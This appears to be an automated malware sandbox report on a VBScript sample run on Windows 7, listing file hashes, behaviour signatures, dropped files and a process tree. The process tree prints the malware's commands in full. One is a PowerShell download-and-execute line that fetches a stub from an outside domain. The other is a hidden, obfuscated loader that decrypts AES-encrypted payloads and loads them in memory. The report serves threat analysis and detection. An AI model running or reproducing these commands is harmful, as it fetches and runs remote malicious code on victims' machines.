Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    18-12-2024 02:36

General

  • Target

    6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs

  • Size

    66KB

  • MD5

    db10d2a27be78c780e5757b46a265e6d

  • SHA1

    36f720617c0f2eb5fd700dc06714fb069dea7eb9

  • SHA256

    6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d

  • SHA512

    58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7

  • SSDEEP

    1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\c.bat

    Filesize

    62KB

    MD5

    b318d9f0c62b86e1c78917fa43630e1f

    SHA1

    e57533546987c2f91db873ab2b756bd752deafda

    SHA256

    4b429c11db344779526f0cdacc411ec8835f2682d5212ad5f5b0c1d48020a028

    SHA512

    b0417872bd1234e1ac2ecf80c14396ab92f177d54edeb1cc296b2f51af0138f3bfd11f2431f879ad59abfefb9fa83ec93e4c9ce8e14abd79cd1faf1c9217a75c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\14AYEJZX6HZN1JZD2YQT.temp

    Filesize

    7KB

    MD5

    30262cee495f42019cb515ebcad1c74c

    SHA1

    1a47cdf4b961c34cc047b7a2a97ead4ec29a647c

    SHA256

    bdadf9e13beee2bce422bc27334d21015ac8229d86fd64ac6029409105269ce0

    SHA512

    00adfcccefed62c4cb942a25a9d43f751753fcdbabd76f0b63350bc460ba90a36051a35c40265f5f5b19a94209e56b0ad9b53caca52c4fa9fb99d5a9be7789b7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    aa64ad676f261352ecdcfbfe9a4e84a9

    SHA1

    992ca390deeca52bbb1e5d98d0509692387f2268

    SHA256

    3a5142f2a0afc3fbcdc85766ec943e84f6ec7263e70fe45b11a9d42d10d6a6be

    SHA512

    b53c5612617eb08ae64df0ce20996f613de3ca4f989b99c739b1efd0e85fa60450c5bf9c1ee10a6adf0b8af2acba2ca56d1a06405d5880e12edc791fa5a964fd

  • memory/2724-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

    Filesize

    4KB

  • memory/2724-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2724-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2724-6-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

  • memory/2724-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2724-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2724-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2724-11-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

    Filesize

    4KB

  • memory/2724-12-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

    Filesize

    9.6MB